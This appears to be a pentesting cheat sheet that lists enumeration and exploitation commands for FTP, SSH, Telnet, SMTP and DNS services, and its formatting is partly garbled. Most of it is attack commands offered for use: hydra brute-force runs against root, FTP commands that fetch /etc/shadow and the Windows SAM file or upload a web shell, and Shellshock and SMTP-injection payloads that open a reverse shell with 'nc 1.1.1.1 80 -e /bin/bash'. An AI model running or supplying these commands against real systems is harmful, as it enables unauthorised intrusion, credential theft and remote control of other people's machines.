Adding constantly content, depending on free time :)
Instead of writing a list of tasks to perform on each port/service or using old tools, I will write the full command with arguments to enumerate and (possibly) exploit it with newest tools.
$iprefers to simply the variable assigned withexport ip=10.10.10.10Remember to switch between wordlists if one just doesn't give out results
Enumeration
- Banner:
nc -vn $ip [PORT]
- Reuse credentials from other local services
searchsploit [SERVICE NAME]+[VERSION]
Enumeration
- Anonymous login
nmap --script ftp-anon -p21 $ip** Exploitation**
- Connect and try to download/upload files (even if you can't
cdinto that directory):get /etc/shadowget C:\\Windows\\system3\\config\\SAMput shell.aspx
- Brute-force:
hydra -l root -P /usr/share/wordlists/rockyou.txt $ip ftp -t 1
Enumeration
- Anonymous login
nmap --script ftp-anon -p21 $ipExploitation
- Reuse private key from other machines
- Shellshock:
ssh root@$ip 'nc 1.1.1.1 80 -e /bin/bash'
- Brute-force:
hydra -l root -P /usr/share/wordlists/rockyou.txt $ip ssh
Exploitation
- Brute-force:
hydra -l root -P /usr/share/wordlists/rockyou.txt $ip telnet -t 1
Enumeration
- Enum users
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t $ipExploitation
- Send mail with malicious parameters:
ehlo server.commail from: 'nc 1.1.1.1 80 -e /bin/bash'rcpt to: 'nc 1.1.1.1 80 -e /bin/bash'data Subject: nc 1.1.1.1 80 -e /bin/bash
Enumeration
- Zone Transfer:
dig @axfr @$ip server.com +nocookie